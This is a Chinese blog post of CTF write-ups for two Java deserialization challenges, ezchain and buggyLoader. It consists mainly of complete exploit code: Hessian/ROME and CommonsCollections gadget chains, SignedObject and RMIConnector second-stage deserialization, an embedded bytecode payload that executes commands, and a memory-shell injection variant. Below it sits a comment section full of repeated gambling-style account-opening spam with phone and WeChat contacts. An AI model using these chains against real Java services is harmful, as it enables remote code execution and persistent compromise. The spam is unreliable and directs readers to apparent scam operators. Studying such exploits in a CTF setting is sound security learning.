2022CTF 康复训练2

[虎符CTF 2022]ezchain

从 docker-compose 中能判断不出网

反编译后查看 handle，首先需要实现一个 hash 碰撞，然后就是一个 Hessian 反序列化的接口。

hashcode 部分实际上就是实现了一个 31 进制转换，把前两位的 HF 换成 Ge 就能绕过了。

然后就是不出网的 hessian 反序列化的利用，用了 java.security.SignedObject 的二次反序列化，原因前面的 hessian 反序列化已经提过了（这里使用 codeql 工具审出来的，具体操作。。。下次一定）
poc：（第一次反序列化调用原生 readObject，第二次反序列化直接用 CC2 打就可）

import com.caucho.hessian.io.Hessian2Input;
import com.caucho.hessian.io.Hessian2Output;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.rometools.rome.feed.impl.EqualsBean;
import com.rometools.rome.feed.impl.ObjectBean;
import com.rometools.rome.feed.impl.ToStringBean;
import sun.security.provider.DSAPrivateKey;
import org.slf4j.impl.StaticLoggerBinder;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.security.*;
import java.util.Base64;
import java.util.HashMap;

public class payload {
    public static void main(String[] args) throws IOException, NoSuchFieldException, IllegalAccessException, SignatureException, InvalidKeyException {
        HashMap hashMapx = getObject();

        // 构造SignedObject对象
        SignedObject signedObject = new SignedObject(hashMapx, new DSAPrivateKey(), new Signature("x") {
            @Override
            protected void engineInitVerify(PublicKey publicKey) throws InvalidKeyException {

            }

            @Override
            protected void engineInitSign(PrivateKey privateKey) throws InvalidKeyException {

            }

            @Override
            protected void engineUpdate(byte b) throws SignatureException {

            }

            @Override
            protected void engineUpdate(byte[] b, int off, int len) throws SignatureException {

            }

            @Override
            protected byte[] engineSign() throws SignatureException {
                return new byte[0];
            }

            @Override
            protected boolean engineVerify(byte[] sigBytes) throws SignatureException {
                return false;
            }

            @Override
            protected void engineSetParameter(String param, Object value) throws InvalidParameterException {

            }

            @Override
            protected Object engineGetParameter(String param) throws InvalidParameterException {
                return null;
            }
        });

        // 构造ToStringBean
        ToStringBean toStringBean = new ToStringBean(SignedObject.class, signedObject);
        ToStringBean toStringBean1 = new ToStringBean(String.class, "s");

        // 构造ObjectBean
        ObjectBean objectBean = new ObjectBean(ToStringBean.class, toStringBean1);

        // 构造HashMap
        HashMap hashMap = new HashMap();
        hashMap.put(objectBean,"aaaa");

        // 反射修改字段
        Field obj = EqualsBean.class.getDeclaredField("obj");
        Field equalsBean = ObjectBean.class.getDeclaredField("equalsBean");

        obj.setAccessible(true);
        equalsBean.setAccessible(true);

        obj.set(equalsBean.get(objectBean), toStringBean);

        Hessian2Output hessianOutput1 = new Hessian2Output(new FileOutputStream("./second.ser"));
        hessianOutput1.writeObject(hashMap);
        hessianOutput1.close();
    }

    public static void setFieldValue(Object obj,String name,Object value) throws NoSuchFieldException, IllegalAccessException {
        Field field=obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj,value);
    }

    public static HashMap getObject() throws NoSuchFieldException, IllegalAccessException {
        //构造TemplatesImpl对象
        byte[] bytecode= Base64.getDecoder().decode("yv66vgAAADQAIAoABgATCgAUABUIABYKABQAFwcACQcAGAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAZAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAClNvdXJjZUZpbGUBAAlDb2RlLmphdmEMAAcACAcAGwwAHAAdAQAEY2FsYwwAHgAfAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvaW8vSU9FeGNlcHRpb24BADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAAC4AAgABAAAADiq3AAG4AAISA7YABFexAAAAAQAKAAAADgADAAAADAAEAA0ADQAOAAsAAAAEAAEADAABAA0ADgACAAkAAAAZAAAAAwAAAAGxAAAAAQAKAAAABgABAAAAEgALAAAABAABAA8AAQANABAAAgAJAAAAGQAAAAQAAAABsQAAAAEACgAAAAYAAQAAABYACwAAAAQAAQAPAAEAEQAAAAIAEg==");
        byte[][] bytee= new byte[][]{bytecode};
        TemplatesImpl templates=new TemplatesImpl();
        setFieldValue(templates,"_bytecodes",bytee);
        setFieldValue(templates,"_name","Code");
        setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());

        //构造ToStringBean
        ToStringBean toStringBean = new ToStringBean(Templates.class,templates);
        ToStringBean toStringBean1 = new ToStringBean(String.class, "s");

        //构造ObjectBean
        ObjectBean objectBean=new ObjectBean(ToStringBean.class,toStringBean1);

        //构造HashMap
        HashMap hashMap=new HashMap();
        hashMap.put(objectBean,"aaaa");

        //反射修改字段
        Field obj=EqualsBean.class.getDeclaredField("obj");
        Field equalsBean=ObjectBean.class.getDeclaredField("equalsBean");

        obj.setAccessible(true);
        equalsBean.setAccessible(true);

        obj.set(equalsBean.get(objectBean),toStringBean);

        return hashMap;
    }
}

可以执行命令但不出网不能弹 shell，考虑将执行命令的结果写到文件中再读文件，但操作起来比较麻烦，实战中也要考虑路径的问题。
这里参考内存马获取回显的思路，想办法拿到存储 Request 或 Respnse 的全局变量，通常是再线程中找，可以劫持 handler 实现内存马。

最终能注入的 poc：

import com.caucho.hessian.io.Hessian2Input;
import com.caucho.hessian.io.Hessian2Output;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.rometools.rome.feed.impl.EqualsBean;
import com.rometools.rome.feed.impl.ObjectBean;
import com.rometools.rome.feed.impl.ToStringBean;
import sun.security.provider.DSAPrivateKey;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.security.*;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.NotFoundException;
import java.util.HashMap;

public class payload {

    public static void main(String[] args) throws IOException, NoSuchFieldException, IllegalAccessException, SignatureException, InvalidKeyException, NotFoundException, CannotCompileException {
        HashMap hashMapx = getObject();

        // 构造SignedObject对象
        SignedObject signedObject = new SignedObject(hashMapx, new DSAPrivateKey(), new Signature("x") {
            @Override
            protected void engineInitVerify(PublicKey publicKey) throws InvalidKeyException {

            }

            @Override
            protected void engineInitSign(PrivateKey privateKey) throws InvalidKeyException {

            }

            @Override
            protected void engineUpdate(byte b) throws SignatureException {

            }

            @Override
            protected void engineUpdate(byte[] b, int off, int len) throws SignatureException {

            }

            @Override
            protected byte[] engineSign() throws SignatureException {
                return new byte[0];
            }

            @Override
            protected boolean engineVerify(byte[] sigBytes) throws SignatureException {
                return false;
            }

            @Override
            protected void engineSetParameter(String param, Object value) throws InvalidParameterException {

            }

            @Override
            protected Object engineGetParameter(String param) throws InvalidParameterException {
                return null;
            }
        });

        // 构造ToStringBean
        ToStringBean toStringBean = new ToStringBean(SignedObject.class, signedObject);
        ToStringBean toStringBean1 = new ToStringBean(String.class, "s");

        // 构造ObjectBean
        ObjectBean objectBean = new ObjectBean(ToStringBean.class, toStringBean1);

        // 构造HashMap
        HashMap hashMap = new HashMap();
        hashMap.put(objectBean,"aaaa");

        // 反射修改字段
        Field obj = EqualsBean.class.getDeclaredField("obj");
        Field equalsBean = ObjectBean.class.getDeclaredField("equalsBean");

        obj.setAccessible(true);
        equalsBean.setAccessible(true);

        obj.set(equalsBean.get(objectBean), toStringBean);

        Hessian2Output hessianOutput1 = new Hessian2Output(new FileOutputStream("./second.ser"));
        hessianOutput1.writeObject(hashMap);
        hessianOutput1.close();
    }

    public static void setFieldValue(Object obj,String name,Object value) throws NoSuchFieldException, IllegalAccessException {
        Field field=obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj,value);
    }

    public static HashMap getObject() throws NoSuchFieldException, IllegalAccessException, IOException, CannotCompileException, NotFoundException {
        //构造TemplatesImpl对象
        ClassPool pool = ClassPool.getDefault();
        CtClass cc = pool.get("testHandler");
        byte[] bytecode=cc.toBytecode();
        byte[][] bytee= new byte[][]{bytecode};
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates,"_bytecodes",bytee);
        setFieldValue(templates,"_name","Code");
        setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());

        //构造ToStringBean
        ToStringBean toStringBean = new ToStringBean(Templates.class,templates);
        ToStringBean toStringBean1 = new ToStringBean(String.class, "s");

        //构造ObjectBean
        ObjectBean objectBean = new ObjectBean(ToStringBean.class,toStringBean1);

        //构造HashMap
        HashMap hashMap=new HashMap();
        hashMap.put(objectBean,"aaaa");

        //反射修改字段
        Field obj=EqualsBean.class.getDeclaredField("obj");
        Field equalsBean=ObjectBean.class.getDeclaredField("equalsBean");

        obj.setAccessible(true);
        equalsBean.setAccessible(true);

        obj.set(equalsBean.get(objectBean),toStringBean);

        return hashMap;
    }
}

[TCTF 2021]buggyLoader

java 反序列化，但问题是反序列化的这个 objectInputStre
am 是重写的，resolveClass 也被重写了，和原生的 readObject 做一下对比

forname 加载变成了调用 URLClassLoader 的 loadClass 加载，可参考 shiro 反序列化的利用，shiro 在 readObject 前调用ClassResolvingObjectInputStream 重写了 resolveClass，也是使用了 ClassLoader.loadClass。
它们之间的区别（简单理解）是 Class.forName 能解析数组类型，但 ClassLoader 不会解析数组类型，加载时会抛出 ClassNotFoundException。
但这个题的 ClassLoader 和 shiro 还不太一样，在 shiro 中用的是 tomcat 的类加载机制，也就是双亲委派

在反序列化的时候不能加载 WEB-INF/lib 下的数组类型，但无数组类型的 CC3 就能打（即使里面用到了 java 原生类数组 byte[] 等）。
但这个题卡的就很死，p 神提到的用 CC5 打 TemplatesImpl 是用不了的。（执行过程中还是调用了数组类型）

打法1：出网条件下的 JRMPClient

打法2：RMIConnectorServer 二次反序列化

利用自动审计工具找到了利用点 javax.management.remote.rmi.RMIConnector#findRMIServerJRMP

其中传入的 base64 可控，将 base64 解码后会对其进行反序列化操作，然后随便选一条链子接着打就行了。（get 交不了要改成 post）

package myexp.buggyloader;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.*;
import ysoserial.payloads.util.Reflections;
import javax.management.remote.JMXServiceURL;
import javax.management.remote.rmi.RMIConnector;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;

public class JMX {
    public static void main(String[] args) throws Exception {
        Object obj = getObject();
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oss = null;
        oss = new ObjectOutputStream(bos);
        oss.writeUTF("SJTU");
        oss.writeInt(1896);
        oss.writeObject(obj);
        oss.flush();
        byte[] bytes = bos.toByteArray();
        bos.close();

        String hex = Utils.bytesTohexString(bytes);
        System.out.println(hex);
        byte[] b2 = Utils.hexStringToBytes(hex);
        InputStream inputStream1 = new ByteArrayInputStream(b2);
        ObjectInputStream objectInputStream1 = new MyObjectInputStream(inputStream1);
        System.out.println(objectInputStream1.readUTF());
        System.out.println(objectInputStream1.readInt());
        Object obj2 = objectInputStream1.readObject();
    }

    private static Object getObject() throws Exception {
        Transformer transformer = InvokerTransformer.getInstance("connect");
        CommonsCollections5 commonsCollections5 = new CommonsCollections5();
        ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(outputStream);
        objectOutputStream.writeObject(commonsCollections5.getObject("calc"));
        String expbase64 = new String(Base64.getEncoder().encode(outputStream.toByteArray()));
        String finalExp = "service:jmx:rmi:///stub/" + expbase64;
        RMIConnector rmiConnector = new RMIConnector(new JMXServiceURL(finalExp), new HashMap<>());

        Map innerMap = new HashMap();
        Map lazyMap = LazyMap.decorate(innerMap, transformer);
        TiedMapEntry entry = new TiedMapEntry(lazyMap, rmiConnector);
        HashSet map = new HashSet(1);
        map.add("foo");
        Field f = null;

        try {
            f = HashSet.class.getDeclaredField("map");
        } catch (NoSuchFieldException var18) {
            f = HashSet.class.getDeclaredField("backingMap");
        }

        Reflections.setAccessible(f);
        HashMap innimpl = (HashMap) f.get(map);
        Field f2 = null;

        try {
            f2 =HashMap.class.getDeclaredField("table");
        } catch (NoSuchFieldException var17) {
            f2 = HashMap.class.getDeclaredField("elementData");
        }

        Reflections.setAccessible(f2);
        Object[] array = (Object[]) ((Object[]) f2.get(innimpl));
        Object node = array[0];
        if (node == null) {
            node = array[1];
        }

        Field keyField = null;

        try {
            keyField = node.getClass().getDeclaredField("key");
        } catch (Exception var16) {
            keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
        }

        Reflections.setAccessible(keyField);
        keyField.set(node, entry);
        return map;
    }
}

从 connect 开始分析

然后进入 findRMIServer，其中 directoryURL 中存放着 payload

之后就可以进入 findRMIServerJRMP 触发二次反序列化。

参考文献

已有 13 条评论

olaisyfmft

September 23rd, 2024 at 09:20 am

想想你的文章写的特别好https://www.jiwenlaw.com/

回复
qraypdazwe

December 25th, 2024 at 07:08 pm

《新版地狱天使》泰国剧高清在线免费观看：https://www.jgz518.com/xingkong/136193.html

回复
ulqfyuimmm

February 28th, 2025 at 11:26 pm

内容的丰富性和深度让人仿佛置身于知识的海洋，受益匪浅。

回复
htufzrzdum

March 2nd, 2025 at 07:27 am

对趋势的预判具有战略参考价值。

回复
ingitzxjcs

March 2nd, 2025 at 08:08 pm

情感真挚自然，字里行间传递出强烈的感染力。

回复
ozaysmhvta

October 5th, 2025 at 12:08 am

新车上路，只带前10个人coinsrore.com

回复
鍗庣撼鍏徃鍚堜綔寮€鎴锋墍闇€鏉愭枡锛熺數璇濆彿鐮?5587291507 寰俊STS5099

October 31st, 2025 at 10:29 pm

微信电话同步?【——183-88909465—微电同号】?华纳公司客服联系方式?【6011643——183-88909465——-】、?华纳公司直属开户
华纳公司注册会员流程？（▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
如何成为华纳公司会员？（▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
华纳直属会员开户步骤？（▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
华纳公司会员注册指南？（▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
华纳总公司会员申请？（▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
华纳公司会员注册所需材料？（▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
华纳会员开户流程？（▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
华纳公司注册会员步骤？（▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
华纳会员申请流程？（▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】（▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
华纳公司会员注册指南？（▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】

回复
鍗庣撼鍏徃鍚堜綔寮€鎴锋墍闇€鏉愭枡锛熺數璇濆彿鐮?5587291507 寰俊STS5099

November 1st, 2025 at 01:05 pm

华纳东方明珠客服微信？（▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】

回复
鍗庣撼鍏徃鍚堜綔寮€鎴锋墍闇€鏉愭枡锛熺數璇濆彿鐮?5587291507 寰俊STS5099

November 2nd, 2025 at 01:36 pm

华纳东方明珠客服电话是多少？（▲18288362750?《?微信STS5099? 】
如何联系华纳东方明珠客服？（▲18288362750?《?微信STS5099? 】
华纳东方明珠官方客服联系方式？（▲18288362750?《?微信STS5099?
华纳东方明珠客服热线？（▲18288362750?《?微信STS5099?
华纳东方明珠24小时客服电话？（▲18288362750?《?微信STS5099? 】
华纳东方明珠官方客服在线咨询？（▲18288362750?《?微信STS5099?

回复
鍗庣撼鍏徃鍚堜綔寮€鎴锋墍闇€鏉愭枡锛熺數璇濆彿鐮?5587291507 寰俊STS5099

November 7th, 2025 at 01:39 pm

华纳万宝路客服电话是多少？（?183-8890-9465—《?薇-STS5099】【?扣6011643??】
华纳万宝路开户专线联系方式？（?183-8890--9465—《?薇-STS5099】【?扣6011643??】
华纳圣淘沙客服开户电话全攻略，让娱乐更顺畅！（?183-8890--9465—《?薇-STS5099】客服开户流程，华纳圣淘沙客服开户流程图（?183-8890--9465—《?薇-STS5099】

回复
鍗庣撼鍏徃鍚堜綔寮€鎴锋墍闇€鏉愭枡锛熺數璇濆彿鐮?5587291507 寰俊STS5099

November 8th, 2025 at 02:05 pm

果博东方客服开户联系方式【182-8836-2750—】?薇- cxs20250806】
果博东方公司客服电话联系方式【182-8836-2750—】?薇- cxs20250806】
果博东方开户流程【182-8836-2750—】?薇- cxs20250806】
果博东方客服怎么联系【182-8836-2750—】?薇- cxs20250806】

回复
鍗庣撼鍏徃鍚堜綔寮€鎴锋墍闇€鏉愭枡锛熺數璇濆彿鐮?5587291507 寰俊STS5099

November 21st, 2025 at 01:54 pm

寻找华纳圣淘沙公司开户代理（183-8890-9465薇-STS5099】
华纳圣淘沙官方合作开户渠道（183-8890-9465薇-STS5099】
华纳圣淘沙公司开户代理服务（183-8890-9465薇-STS5099】
华纳圣淘沙公司开户咨询热线（183-8890-9465薇-STS5099】
联系客服了解华纳圣淘沙开户
（183-8890-9465薇-STS5099】
华纳圣淘沙公司开户专属顾问
（183-8890-9465薇-STS5099】

回复
鍗庣撼鍏徃鍚堜綔寮€鎴锋墍闇€鏉愭枡锛熺數璇濆彿鐮?5587291507 寰俊STS5099

November 22nd, 2025 at 01:44 pm

《华纳圣淘沙公司开户流程全解析》→ 官方顾问一对一指导??? 安全联系：183第三段8890第四段9465
《华纳圣淘沙开户步骤详解》→ 」专属通道快速办理??? 安全联系：183第三段8890第四段9465
《华纳圣淘沙账户注册指南》→ 扫码获取完整资料清单?「微?? 安全联系：183第三段8890第四段9465
《新手开通华纳圣淘沙公司账户指南》→ 限时免费咨询开放??? 安全联系：183第三段8890第四段9465
《华纳圣淘沙企业开户标准流程》→ 资深顾问实时解答疑问??? 安全联系：183第三段8890第四段9465
《华纳圣淘沙开户步骤全景图》→ 点击获取极速开户方案??? 安全联系：183第三段8890第四段9465
《华纳圣淘沙账户创建全流程手册》→ 预约顾问免排队服务?9?? 安全联系：183第三段8890第四段9465 《从零开通华纳圣淘沙公司账户》→ 添加客服领取开户工具包?? 安全联系：183第三段8890第四段9465
《官方授权：华纳圣淘沙开户流程》→ 认证顾问全程代办?」?? 安全联系：183第三段8890第四段9465
《华纳圣淘沙开户说明书》→立即联系获取电子版文件??? 安全联系：183第三段8890第四段9465

回复